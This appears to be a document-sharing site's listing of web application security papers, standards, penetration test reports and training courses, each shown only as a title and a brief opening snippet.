Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationNNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a: WIN- 2LR8M18J6A1 On WIN-2LR8M18J6A1 - By admin for time period 6/10/2014 8:59:44 AM to 6/10/2014 8:59:44 AM NNT CIS Microsoft
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationWeb Application Security. Srikumar Venugopal S2, Week 8, 2013
Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationWebCruiser Web Vulnerability Scanner User Guide
WebCruiser Web Vulnerability Scanner User Guide Content 1. Software Introduction...2 2. Key Features...3 2.1. POST Data Resend...3 2.2. Vulnerability Scanner...6 2.3. SQL Injection...8 2.3.1. POST SQL
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationBypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationSecure Programming Lecture 12: Web Application Security III
Secure Programming Lecture 12: Web Application Security III David Aspinall 6th March 2014 Outline Overview Recent failures More on authorization Redirects Sensitive data Cross-site Request Forgery (CSRF)
More informationSpigit, Inc. Web Application Vulnerability Assessment/Penetration Test. Prepared By: Accuvant LABS
Web Application Vulnerability Assessment/enetration Test repared By: Accuvant LABS November 20, 2012 Web Application Vulnerability Assessment/enetration Test Introduction Defending the enterprise against
More informationTop Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia
Top Ten Web Application Vulnerabilities in J2EE Vincent Partington and Eelco Klaver Xebia Introduction Open Web Application Security Project is an open project aimed at identifying and preventing causes
More informationWHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
More informationCross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
More informationASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
More informationEnterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
More informationThomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch
Thomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch What
More information